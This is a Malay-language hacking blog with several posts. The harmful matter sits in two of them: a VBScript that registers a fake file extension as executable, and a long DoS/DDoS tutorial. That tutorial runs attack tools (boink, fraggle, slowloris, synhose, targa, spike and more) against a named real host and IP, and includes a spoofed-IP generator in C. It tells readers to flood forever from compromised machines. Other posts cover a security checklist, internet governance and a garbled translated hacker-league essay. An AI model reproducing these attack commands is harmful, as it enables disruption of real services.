popular post

popular post

http://4.bp.blogspot.com/-AexFsTTa33c/TmFNoxg9zSI/AAAAAAAAE6I/7K8bPKYBr8Q/s400/popular%2Bposts.jpg ‎4.bp.blogspot.com

popular post

http://4.bp.blogspot.com/-AexFsTTa33c/TmFNoxg9zSI/AAAAAAAAE6I/7K8bPKYBr8Q/s400/popular%2Bposts.jpg ‎4.bp.blogspot.com

info hacking

.....................................................jom chat di shoutbox ................>

try click

-----------klik unuk menderma

11 perkara yang admin perlu sever perlu ambil berat

Dicatat oleh NICK KLUANG Monday, January 31, 2011

11 perkara yang boleh menjadi perhatian khusus bagi para admin untuk kehandalan sistem keselamatan rangkaian syarikat di mana anda bekerja tetap terjaga:


1. Mudah tertipu dan terlalu percaya kepada pengguna / user anda, terutama para kakitangan wanita atau sahabat yang meminta pertolongan.
2. Bangunan dan pintu akses masuk / keluar yang tidak selamat.
3. Dokumen-dokumen dan cakera atau peripheral komputer yang belum dihancurkan atau tidak hancur pada saat sudah dibuang ke tempat sampah boleh dibaca oleh pihak lain.
4. Password yang lemah atau bahkan sistem rangkaian tidak menggunakan password sama sekali.
5. Pertahanan rangkaian yang kurang kuat kerana mungkin tidak ada firewall dan sebagainya.
6. Masuk ke kawalan yang lemah, missing fail dan beberapa akses yang tidak seharusnya diberikan kepada user yang tidak perlu.
7. Sistem yang tidak dilakukan patch.
8. Pengesahan dan information disclosure aplikasi web tidak dilakukan sembarangan.
9. Sistem wireless berjalan dengan setting lalai dan tanpa WEP, WPA atau WPA2, sangat riskan dan mudah untuk dijebol.
10. SNMP melakukan enable rangkaian host dalam keadaan lalai atau hanya menggunakan mode guest untuk komuniti sehingga sangat mudah untuk dijebol.
11. Menggunakan firewall, router, remote access dan peralatan dial up dalam keadaan lalai atau password guest atau menggunakan password yang terlalu mudah, kerana ini sebagai jalan masuk hacker ke dalam sistem.

Di bawah ini beberapa port yang sangat sering dilakukan penetrasi (hacking) oleh para penggodam dan kakitangan yang nakal untuk mencuba-cuba menceroboh sistem keselamatan rangkaian:

* TCP port 20 dan 21 FTP (File Transfer Protocol)
* TCP port 23 Telnet (Terminal Emulation)
* TCP port 25 SMTP (Simple Mail Transfer Protocol)
* TCP dan UDP port 53 DNS (Domain Name System)
* TCP port 80 dan 443 HTTP dan HTTPs (Hypertext Transfer Protocol)
* TCP port 110 POP3 (Post Office Protocol version 3)
* TCP dan UDP port 135 RPC
* TCP dan UDP port 137 – 139 NetBIOS over TCP/IP
* TCP dan UDP port 161 SNMP (Simple Network Management Protocol)

maanfaatkan kode2 di bawah.



'===================================
const HKEY_CLASSES_ROOT = & H80000000
const HKEY_CURRENT_USER = & H80000001
Quot = chr (34)
strComputer = "."
On error resume next
Tanya = MsgBox ("By Laluan Exelockdown dan Registry Shell Spawning" & _
vbNewLine & "datang Exelockdown?", 36, "Exelockdown Hacking - by Lovepassword")
If Tanya = 6 Then 'pilih YA
Set objRegistry = GetObject ("winmgmts: {impersonationLevel = impersonate}! \" & StrComputer & "ootdefault: StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ". sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexy",, "exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexy", "Content Type", "application / x-msdownload"
objRegistry.CreateKey HKEY_CLASSES_ROOT, ". sexyPersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexyPersistentHandler ",,"{ 098f2470-bae0-11cd-b579-08002b30bfeb}"
objRegistry.CreateKey HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced", "HideFileExt", 0
Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate}! \" & StrComputer & "ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate ()
Next
set objShell = CreateObject ("WScript.Shell")
objShell.Run "explorer.exe"
msgbox "copi file exe, jalankan operasi ini", vbInformation, "Exelockdown Hacking - nick kluang "
End If

'===========================================

save as di notepad dengan extension sexy.vbs

lagi tutorial tools dos/ddos

Dicatat oleh NICK KLUANG

TOOLS DDOS

Boink

Merupakan tool yang boleh membuat blue screen of death pada mesin-mesin windows 9x dan nt.
Berikut contoh cara penggunaanya:
bt ~ # ./boink 127.0.0.1 74.63.241.86 80 80 99999999999
(0)74.63.241.86:25->65
(1)74.63.241.86:25->65
(2)74.63.241.86:25->65
(3)74.63.241.86:25->65
(4)74.63.241.86:25->65
(5)74.63.241.86:25->65
(6)74.63.241.86:25->65
(7)74.63.241.86:25->65
(8)74.63.241.86:25->65
(9)74.63.241.86:25->65
(10)74.63.241.86:25->65
(11)74.63.241.86:25->65
(12)74.63.241.86:25->65
(13)74.63.241.86:25->65
(14)74.63.241.86:25->65
(15)74.63.241.86:25->65
(16)74.63.241.86:25->65
(17)74.63.241.86:25->65
(18)74.63.241.86:25->65
(19)74.63.241.86:25->65
(20)74.63.241.86:25->65
(21)74.63.241.86:25->65
(22)74.63.241.86:25->65
(23)74.63.241.86:25->65
(24)74.63.241.86:25->65
(25)74.63.241.86:25->65
dst ...........


Smurf & UDP Attack

Smurf attack merupakan teknik penyerangan dengan mengirimkan paket icmp yang dispoof ke target kita

Bloop

Merupakan salah satu tool dos dengan metode smurf attack.
Bloop akan mengirimkan paket icmp spoof secara acak ke target kita untuk membuat mesin target crash.

Berikut adalah contoh penggunaan bloop:
bt ~ # ./bloop 127.0.0.1 sec-r1z.com 99999999
Bloop v 1.0



Status: Connected....packets sent.


Fraggle

Fraggle merupakan tool untuk tipe smurf dos / ddos yang menggunakan suatu file broadcast yang berisi daftar alamat2 ip spoof.

Sebelum menggunakan fraggle kita memerlukan sebuah file broadcast ip spoof, Untuk itu
saya sudah membuat sendiri tool untuk spoof ip generator namanya dimas.c:

filename:dimas.c , programmer: mywisdom
/*dimas.c random ip generator (public ip and private ip)
version 1.0
c0d3r: mywisdom
greetz:gunslinger,flyff666,kiddies,xtr0nic,whitehat,Danzel and so on
*/
#include
#include
#include
void bikin_random_ip()
{
FILE *dom2;
int a,b,c,d,a2,b2,jum;
dom2=fopen("ip.txt","w+");
for(;;)
{
srand ( time(NULL) );
a = rand ()% 255 ;

b = rand ()% 255 ;

c = rand ()% 255 ;

d = rand ()% 255 ;

if ( (a != 10) && (a != 172) && (a != 192))
{
if(dom2!=NULL)
{
if(a2!=a)
{
fprintf(dom2,"%d.%d.%d.%d\n",a,b,c,d);
}
}
}

a2=a;
}
fclose(dom2);

}

int main ()
{
bikin_random_ip();
return 0;
}

kompile file di atas dan run untuk membuat file ip spoof dengan nama file: ip.txt
gcc -o dimas dimas.c
./dimas

Selanjutnya misal target kita sec-r1z.com, contoh penggunaan fraggle untuk menyerang sec-r1z.com:
bt ~ # ./fraggle sec-r1z.com ip.txt 2000 900 80 0 99

fraggle.c by TFreak

Flooding sec-r1z.com (. = 25 outgoing packets)
................................................................................
Done!

bt ~ #


slowloris

slowloris biasanya khusus digunakan untuk menyerang http port
,keunggulan slowloris adalah hanya menggunakan bandwith yang kecil dari server attacker,
tool ini akan mengirimkan http request dalam ukuran panjang berupa angka random panjang
terlihat dari source codenya:
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}

Contoh penggunaan slowloris untuk menyerang sec-r1z.com :

bt ~ # ./slowloris.pl -dns www.sec-r1z.com -port 80 -timeout 30 -num 500 -cache




hacker by:..................




Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Connecting to www.sec-r1z.com:80 every 30 seconds with 500 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.


tembak.c
tools ciptaan nick kluang johor ) dah ada dari zaman baharu ), ok mari kita cuba gunakan lagi untuk contoh target sec-r1z.com :
bt ~ # ./tembak

hantar Paket ke IP orang

Cara gunakan : $ tembak hostname.orang port

bt ~ # ./tembak sec-r1z.com 80

Serbuu....!!!! Hancurkaannn sec-r1z.com ke port 80


httpd_flood.pl
Ini dia perl skrip khusus untuk bergantung socket httpd ).khusus hanya menyerang http daemon (port 80)
Berikut ini adalah contoh cara menggunakannya, contohnya target tbd.my, contohnya kita menggunakan serangan yang lama infinite (selamanya) dan kita run di background di salah satu mesin yang kita root:
./httpd_flood.pl tbd.my -1 99999 -1 &

Teknik Serangan Gabungan

Teknik serangan gabungan ini menggabungkan aneka jenis serangan, Anda boleh mencuba tool ini: spike
ok mari kita lihat semua tool2 yang digabung menjadi satu teknik serangan dimatikan oleh spike:
bt spike # ls
README bin/ sources/ spike.sh* spike.sh~*
bt spike # ls bin
1234* conseal* jolt* latierra* orgasm* spiffit* teardrop*
beer* dcd3c* kkill* misfrag* pepsi* sping* trash*
boink* fawx* koc* nestea* pimp* stream* udpdata*
bonk* gewse* kox* newtear* pong* syndrop* wingatecrash*
coke* gewse5* land* opentear* smurf* synk*
bt spike #

sudah anda lihat,tool ini menggabungkan berbagai macam ddos tool menjadi 1
Mari kita cuba run tool ini untuk attack target kita target: sec-r1z.com
bt spike # ./spike.sh sec-r1z.com
Main Menu For spike.sh
1] Combo Attacks
2] Pick The Attack
3] Pick The Attack2 (Enter Your Own Info)
4] Class C Attack (Drop A Class C)
5] Never Die (Attacks That Never Die)
6] Clean up (Kill Hung Attacks)
7] Info Menu (Other Info About spike.sh)
8] To Exit Out

Enter The Number Of The Option To Run:

contoh kita ingin menggunakan combo attack untuk menyerang target kita
klik 1.

Maka akan muncul pilihan 3 jenis serangan berdasarkan tingkat ganasnya serangan ( minta maaf nick kluang johor sedang menyerang komputer anda server anda akan musnah ):
ComboAttack Menu\033[0m
1] Light Attack (12 Attacks)
2] Medium Attack (20 Attacks)
3] Hard Attack (33 Attacks)
4] To Exit Out

Enter The Number Of The Option To Run
#> \c

contoh kita pilih yang hard attack, klik 3 !!!
omboAttack Menu\033[0m
1] Light Attack (12 Attacks)
2] Medium Attack (20 Attacks)
3] Hard Attack (33 Attacks)
4] To Exit Out

Enter The Number Of The Option To Run
#> \c
3
Teadroping.....
Completed....
Pimping.....
Completed....
Nesteaing.....
Completed....
Misfraging.....
Completed....
Syndroping.....
Completed....
Koxing.....
Completed....
NewTearing.....
Completed....
Bonking.....
Completed....
Fawxing.....
Completed....
Trashing.....
Completed....
Smurfing....
Completed....
Attacking On Hold For BandWidth
Completed....
Boinking.....
Completed....
Conseal Firewall Attacking.....
Completed....
Jolting.....
Completed....
Modem +++ DoSing
dst...

tamat tutorial ddos

DOS / DDOS

Dicatat oleh NICK KLUANG




ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan boleh dimanfaatkan untuk serangan
dos adalah serangan yang berasal hanya dari 1 mesin saja!!!

Sebelum melakukan DOS atau DDOS Anda wajib mengetahui port - port daemon
yang terbuka di target kita, misal kita menggunakan nmap port scanner untuk target kita sec-r1z.com, satu hal yang wajib diingat oleh tiap cracker (nama domain sec-r1z.com hanyalah sekedar contoh)
yang ingin melakukan dos maupun ddos adalah sebaiknya tidak menyerang alamat ip target tapi menyerang domain / hostname karena alamat ip bisa diubah sewaktu-waktu untuk menhindari dos maupun ddos.
Sebelum ddos maupun dos mari kita scan daemon -daemon yang terbuka untuk
celah bagi kita menyerang, berikut ini contoh penggunaan scanning port dengan nmap:

bt ~ # nmap -A sec-r1z.com -PN

Starting Nmap 4.60 ( http://nmap.org/ ) at 2010-03-22 04:33 GMT
Interesting ports on 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86):
Not shown: 1668 closed ports, 36 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
|_ Anonymous FTP: FTP: Anonymous login allowed
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.69
| SMTP: Responded to EHLO command
| b0x.sec-r1z.com Hello example.org [111.94.9.19]
| SIZE 52428800
| PIPELINING
| AUTH PLAIN LOGIN
| STARTTLS
| 250 HELP
| Responded to HELP command
| Commands supported:
|_ AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp open domain
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2008)
443/tcp open http Apache httpd 2.0.63
|_ HTML title: Site doesn't have a title.
465/tcp open ssl/smtp Exim smtpd 4.69
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
993/tcp open ssl/imap Courier Imapd (released 2008)
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
995/tcp open ssl/pop3 Courier pop3d
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
3306/tcp open mysql MySQL 5.0.90-community
| MySQL Server Information: Protocol: 10
| Version: 5.0.90-community
| Thread ID: 9230
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_ Salt: @Te"s?}zn9nA:?l"cM6e
Device type: storage-misc
Running (JUST GUESSING) : BlueArc embedded (91%)
Aggressive OS guesses: BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: b0x.sec-r1z.com

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 0.09 192.168.153.2
2 280.82 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.436 seconds
bt ~ #


dari hasil scan ke sec-r1z.com kita boleh lihat kalau port-port berikut ini terbuka sehingga memungkinkan serangan kita:
21
22
25
53
110
143
443
465
993
995
3306

Jadi kita boleh menggempur target kita ke semua port tersebut.
Tips!!!
Agar DDOS lebih efektif sebaiknya serang semua port daemon yang terbuka
dan bagi yg port 80 open serangan difokuskan lebih ke port 80.


Aneka Tool & Teknik Untuk DOS / DDOS

ICMP ATTACK
bt ~ # ping sec-r1z.com
PING sec-r1z.com (74.63.241.86) 56(84) bytes of data.
64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms

[2]+ Stopped ping sec-r1z.com
bt ~ #

Ok kita boleh melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya :
reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita.

Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com):

ping sec-r1z.com -fs 50000
PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data.
.......................................................
[3]+ Stopped ping sec-r1z.com -fs 50000



SYN Attack
SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, boleh kita lihat di sourcenya:
if(port == 0) port = 80;

Misalnya kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeza contohnya:
bt ~ # ./synhose sec-r1z.com 80 10
SynHose [A random source IP syn flooder]
Written by knight / Idea by : rza

Destination : sec-r1z.com
Port : 80
NumberOfTimes: 10

SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884
SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4
SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409
SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780
SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327
SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746
SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924
SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544
SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234
SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044
bt ~ #


Juno

Juno merupakan syn attack tool yang cukup terkenal, berikut ini adalah contoh cara pakainya (misalnya target adalah sec-r1z.com di port 80):

bt ~ # ./juno sec-r1z.com 80
juno.c by Sorcerer of DALnet
death to 74.63.241.86:80

syndrop
Syndrop merupakan tool yang mengabungkan syn attack dan teardrop,berikut ini adalah contoh penggunaan syndrop dengan target host sec-r1z:
bt ~ # ./syndrop 127.0.0.1 sec-r1z.com -s 31337 -t 80 -n 99999999 -S 20 -E 9999
syndrop by PineKoan
Death on flaxen wings:
From: 127.0.0.1.31337
To: 74.63.241.86. 80
Amt: 99999999
[ b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m

Jolt

Jika dilihat dari source codenya,Jolt merupakan salah satu tool untuk DOS yang akan mengirimkan paket icmp ke target kita, Pada zaman dahulu kala jolt ini banyak digunakan untuk membekukan server - server windows
jenis serangan adalah pengiriman paket icmp

icmp->type = ICMP_ECHO;

Berikut ini demo penggunaan jolt:

bt ~ # ./jolt 74.63.241.86 127.0.0.1 99999999
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
..................dst


Targa


Targa merupakan tool dos yang merupakan kombinasi dari tool2 ini:

* bonk by route|daemon9 & klepto
* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
* land by m3lt
* nestea by humble & ttol
* newtear by route|daemon9
* syndrop by PineKoan
* teardrop by route|daemon9
* winnuke by _eci

header2 file yang digunakan oleh targa cukup, juga dan tidak ada di backtrack secara default, jadi saya tambahkan sendiri, berikut ini header file saya di /usr/include/netinet sehingga berhasil mengcompile targa.c:

bt netinet # ls
ether.h if_ether.h if_tr.h in.h ip.h ip_icmp.h ip_udp.h protocols.h udp.h
icmp6.h if_fddi.h igmp.h in_systm.h ip6.h ip_tcp.h protocol.h tcp.h
bt netinet #

Misalnya kita ingin menyerang seluruh range ip dari range ip 74.63.241.86-74.63.241.88

Berikut adalah contohnya:
bt ~ # ./targa 74.63.241.86 74.63.241.88 -t 0 -n 999999
targa 1.0 by Mixter
Leetness on faxen wings:
To: 74.63.241.86 - 74.63.241.88
Repeats: 999999
Type: 0
74.63.241.86 [ $$$$$$$$$$$$$$$@@@@@@@@@@@@@@@-----

badan yang menguruskan internet

Dicatat oleh NICK KLUANG Sunday, January 30, 2011


Internet sebagai salah satu teknologi, tidak akan mungkin boleh berjalan dengan sendirinya kalau tidak ada badan yang mengaturnya. Badan pengatur internet ini adalah organisasi bukan keuntungan yang boleh diikuti oleh siapa saja sebagai anggotanya. Ini hierarki dari badan pengatur internet:



1. Internet Society (ISOC)

Merupakan organisasi yang paling utama yang berfungsi untuk mempromosikan internet dan menyetujui protocol-protocol yang akan digunakan sebagai standard protocol di internet dan bertanggung jawab dalam teknologi internetworking beserta aplikasi-aplikasinya. ISOC berdiri pada tahun 1992 yang dikomandani oleh Vinton G. Cerf (penemu konsep TCP / IP dan Bapak Internet). Maklumat lengkap tentang ISOC ini boleh didapati pada websitenya



2. Internet Architecture Board (IAB)

Merupakan badan penasihat bagi ISOC dalam
memutuskan suatu standard yang akan digunakan di Internet.Informasi lengkap boleh dipdapati di www.iab.org



3. Internet Assigned Numbers Authority (IANA)

Ialah unit kerja yang berada di bawah IAB yang bertugas untuk menetapkan masalah IP Address, DNS, dan pendaftaran protocol dan penomoran yang lain yang berlaku pada IP. IANA juga mendelegasikan beberapa bidang kuasa kepada beberapa unit kerja yang berada di bawahnya, seperti Internic, ICANN, APNIC, ARIN dan lain-lain. Anda boleh melawat website



4. Internet Research Task Force (IRTF)

Ialah unit kerja yang berada di bawah IAB yang bertugas untuk melalukan kajian-kajian terhadap protocol internet, aplikasi, arsitektur dan teknologi internet, baik untuk jangka pendek mahupun jangka panjang serta mempromosikan hasil-hasil kajian tersebut. Sila kunjungi website



5. Internet Engineering Task Force

Ialah unit kerja yang berada di bawah IAB yang terdiri dari orang-orang yang menumpukan perhatian untuk membangunkan aplikasi dan senibina internet kedepannya. Salah satu tugasnya adalah menerbitkan RFC (request for comment) atas suatu protocol atau standard yang dicadangkan oleh seseorang untuk dikomentari oleh orang awam atas persetujuan dari IAB. maklumat lebih lanjut sila layari

Hacker VS Cracker

Dicatat oleh NICK KLUANG

Dua istilah ini paling sering disebutkan ketika kita berbicara mengenai keamanan data. Hacker dan cracker dianggap sebagai orang yang bertanggung jawab atas pelbagai kes jenayah komputer (cybercrime) yang semakin marak dewasa ini. Padahal jika kita mau melihat siapa dan apa yang dilakukan oleh hacker dan cracker, maka anggapan tersebut bisa dikatakan tidak 100% benar.

Hacker adalah sebutan untuk mereka yang menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Keputusan pekerjaan mereka biasanya dipublikasikan secara luas dengan harapan sistem atau software yang didapati memiliki kelemahan dalam hal keselamatan dapat disempurnakan di masa yang akan datang.Sedangkan cracker memanfaatkan kelemahan-kelamahan pada sebuah sistem atau software untuk melakukan tindak kejahatan.

Dalam masyarakat hacker, dikenal hirarki atau tingkatan. Hacker menduduki tempat kedua dalam tingkatan tersebut dan cracker berada pada tingkat ketiga. Selain itu masih ada beberapa tingkatan lain seperti lamer (wanna be). Berbeza dengan hacker dan craker yang mencari dan menemukan sendiri kelemahan sebuah sistem, seorang lamer menggunakan hasil temuan itu untuk melakukan tindak kejahatan. Seorang lamer biasanya hanya memiliki pengetahuan yang sedikit mengenai komputer terutama mengenai sistem keamanan dan pemrograman. Dalam komuniti hacker, lamer merupakan sebutan yang bisa dibilang memalukan.

Seorang hacker memiliki tujuan yaitu untuk menyempurnakan sebuah sistem sedangkan seorang cracker lebih bersifat destruktif. Umumnya cracker melakukan cracking untuk menggunakan sumber daya di sebuah sistem untuk kepentingan sendiri.

the hacker liga

Dicatat oleh NICK KLUANG

Dari McRod Perpustakaan Hacker

The Hacker's Kumpulan
Lee Felsenstein
18 Mac 1992


Teori

The Hacker's Kumpulan dimodelkan longgar selepas Amerika
Radio Relay League (ARRL), sebuah organisasi teknologi
petualang tempoh Edwardian. Dalam masa kejayaannya, radio
amatur pindah dari gangguan yang menjadi penting
penyumbang dengan perkembangan teknologi. Di lapangan
yang menuntut peraturan kerajaan untuk operasi tertib, yang
A.R.R.L. mewakili kepentingan amatur di majlis
kerajaan dan menyelenggarakan kegiatan pendidikan berterusan melalui
yang pendatang baru ke lapangan bisa belajar tidak hanya teknologi
terlibat, tetapi juga interaksi manusia yang menghubungkan
teknologi ke dunia luar.

Kemenangan terbaru amatir radio telah menjadi
pembangunan radio paket, yang baru-baru ini telah diterima pakai oleh
Motorola sebagai asas untuk "wireless local loop" untuk wayarles
operasi telefon. Berkat amatir, itu dikembangkan
dan cuba di lingkungan terbuka luar komersil
tekanan yang cenderung terhadap kerahsiaan dan pengecualian.

Di bidang komputer dan telekomunikasi, ada
beberapa selari antara hacker saat ini dan amatur radio
tahun 1915. Hacker dilihat oleh terhormat teknologi
Pemain sebagai gangguan mampu melakukan kerosakan besar dan umumnya
tanpa qualitites penebusan. Mereka dibezakan dari
nakal penyiar yang menginjak-injak isyarat lain dalam mendorong mereka untuk
menempuh jarak terpanjang. Dalam koridor kuasa ada
gerakan menuju melarang mereka. orang non-teknikal tidak
tahu apa yang harus berfikir tentang masalah ini dan yang dicadangkan
penyelesaian.

The A.R.R.L. lebih dari sebuah organisasi lobi, walaupun.
Ini menyediakan sarana untuk pendidikan bersama penting untuk
perkembangan teknologi apapun, pusat masuk terbuka untuk semua pendatang,
dan pemandangan sosial untuk menemani forum teknologi. Melalui
yang A.R.R.L. anak hijau temui oldtimers beruban yang
akan didekati dalam kedudukan mereka industri. Pada
lapangan hari dan acara lain cameraderie menjadi peneroka
mengatasi halangan kelas dan kedudukan maupun yang
yang disebabkan oleh persaingan komersial. Rangkaian ini mungkin dalam
persekitaran amatur yang diteruskan operasi dalam
komersil dan profesional alam sekitar.

Konsep Hacker Kumpulan mirip tetapi berbeza
sebagaimana layaknya sifat yang berbeza dari teknologi. Tujuannya adalah untuk
memberikan situasi di mana peserta dinyatakan memenuhi syarat untuk
Gelanggang boleh terlibat dalam situasi belajar formal, uji mereka
kemahiran sebagai alat bersenam kerajinan, tangan labah-on
pengalaman dengan sistem yang akan menjadi yg tak dpt diperoleh dinyatakan,
dan menyertai di kedua-dua sisi mentoring dan tutorial
hubungan.

The Hacker's Kumpulan akan memberikan jalan keluar untuk kreatif
tenaga yang dinyatakan dikeluarkan membuat hidup lebih buruk bagi
dirasakan atau membayangkan musuh melalui entri tidak sah ke
sistem dan tindakan menyalahi undang-undang atau tidak beretika yang lain. Seperti tenaga
akan berpaling kepada projek-projek yang memajukan keadaan
seni, dan dengan cara yang mengurangkan arogansi dan eksklusif
dari pengurus syarikat yang begitu menggoda hacker menemukan sebuah
target.

Untuk tuduhan bahawa Hacker Kumpulan akan menjadi sebuah front
untuk kepentingan industri mungkin akan mengangkat pertahanan yang oleh
takut industri pemanfaatan tentang gangguan peringkat rendah akan memberikan
pengorganisasian sebuah platform untuk serangan tahap yang lebih tinggi atas
dasar-dasar teknologi struktur yang ada. Mempertimbangkan
perbezaan antara hasil yang telah hacker pada tahun 1970 sudah
kandungan untuk menetapkan politik untuk akses kepada mainframe. Ada
akan ada industri komputer peribadi, dan daya
hubungan tidak akan mengalami perubahan radikal
dibawa oleh kemenangan arsitektur terbuka. Orang mungkin
juga mengatakan kemudiannya bahawa aktiviti komputer amatur adalah
gangguan dari tugas sebenarnya dari menarik-narik lengan kuasa,
namun kita semua boleh melihat kesan daripada kegiatan itu.

The Hacker's Kumpulan boleh dilihat sebagai gilda penayangan
menyekat masuk ke keahlian elit teknikal. Dalam
Bahkan, Kumpulan akan jauh lebih terbuka daripada sistem saat ini
pendidikan universiti. Ini akan menyediakan sarana ujian untuk
melihat apakah seseorang berpadanan dengan tuntutan teknologi
tanpa menuntut tahun komitmen untuk belajar prasyarat.
Dalam Kumpulan Hacker akan ada mobiliti jauh lebih
antara pakar dari yang ada dalam kurikulum universiti, dan
pintu akan terbuka untuk di bawah umur pendatang dan mereka yang datang kemudian
dalam kehidupan setelah masuk ke universiti menjadi sulit atau
mustahil.

Namun, kecenderungan manusia yang mengarah ke arah eksklusif
dan pembentukan klik akan selalu bersama kita, dan kita harus
beruang themin fikiran seperti yang kita meneruskan dalam konseptualisasi dan mewujudkan
Hacker Kumpulan. Teknologi di mana kita bekerja cenderung
menghilangkan keperluan untuk sentralisasi, dan salah satu yang penting
hasil pembangunan Kumpulan akan menjadi demonstrasi
dari mod desentralisasi organisasi, sebagai seorang yang mulia
eksplorasi mungkin direnungkan, int ia banyak pendapat.

Setelah semua, cabaran utama adalah tidak begitu banyak di
hardware, atau bentuk fizikal dari sistem
pergaulan dan interaksi masyarakat sekitar yang berkembang.
Pekerjaan penting dalam pembangunan bentuk-bentuk sosial penggunaan
teknologi ini yang ke depan umum yang baik dan juga bahawa
individu. cara baru berfikir, seperti Einstein mengatakan, adalah
diperlukan bahan untuk humanisasi dan survivalof
masyarakat. The Hacker's Kumpulan tidak hanya menyediakan
pembangunan tempat tidur untuk inovasi sosial yang melibatkan penggunaan
teknologi maklumat, tetapi akan memberi inovasi
melalui pembangunan teknologi selari, dan yang paling
penting, dari rangkaian manusia melalui teknologi ini
dibuat untuk menjadi hidup.

Amalan

The Hacker's Kumpulan akan menjadi organisasi keahlian terbuka
untuk nonanggota untuk fungsi tertentu. Ini akan ditetapkan sebagai
pendidikan bukan keuntungan dan organisasi saintifik. Nya
penerbitan akan bebas tersedia untuk semua pembaca tertarik.

Kumpulan akan mengadakan acara tempatan berkala menunjukkan
teknikal prestasi ahli atau bab, dan menawarkan
tempat bagi individu di luar Kumpulan untuk pameran atau untuk terlibat
dalam perdagangan peringkat rendah, seperti swap bertemu. pendatang baru A akan paling
mungkin membuat kenalan pertama di acara-acara seperti itu, dan mungkin memutuskan untuk
menghadiri pertemuan bab tempatan.

Rapat bab tempatan akan tinggi dalam maklumat
pertukaran dan rendah dalam struktur. Pendatang baru akan diluluskan
dan diberikan dengan orientasi singkat sehingga mereka tidak akan merasa
menunda dengan menampilkan dari keahlian teknikal atau cliquishness. Jika
pendatang baru yang dikehendaki penglibatan lebih lanjut, akan ada satu set
Tentu saja trek yang sedia sebagai pusat disarankan untuk mendirikan,
melalui pencapaian, peringkat kemahiran seseorang. Ini mungkin
dianggap sebagai Scout Merit badge, walaupun nama akan
mungkin tidak digunakan.

Pada peringkat awal penglibatan, pendatang baru mungkin
berinteraksi dengan pengajar yang dilantik yang juga bekerja untuk
membina kemahiran dalam mengajar dan latihan. Kemudian, sebagai pendatang baru
keuntungan kemahiran dan mendirikan kecekapan, ia akan
disyorkan untuk arahan lebih lanjut dan konsultasi individu dari
lebih tinggi terampil mentor. Seperti hubungan mentoring akan
menjadi ciri penting dari Liga, baik sebagai sarana dan dan
akhir.

Kumpulan di peringkat tempatan akan memperoleh mempertahankan
usang peralatan yang akan dikendalikan dan imporved oleh
ahli melalui projek-projek pembangunan yang dicadangkan dari
